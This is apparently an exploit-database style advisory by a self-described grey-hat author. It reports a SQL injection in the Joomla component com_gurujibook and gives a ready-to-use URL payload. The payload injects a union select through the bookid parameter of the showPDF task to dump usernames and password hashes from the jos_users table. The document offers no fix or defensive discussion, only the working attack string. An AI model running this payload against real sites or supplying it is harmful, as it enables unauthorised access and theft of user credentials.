/*

Name : Joomla Component com_gurujibook
Vuln : SQL Injection vulnerability

Author : Hamza 'MizoZ' N.
Email : mizozx[at]gmail[dot]com

Greetz : Zuka , Grey Hat Hackers

*/

# SQLI

[HOST]/[PATH]/index.php?option=com_gurujibook&task=showPDF&bookid=-32+union+select+1,2,concat_ws(0x3a,username,password),4+from+jos_users--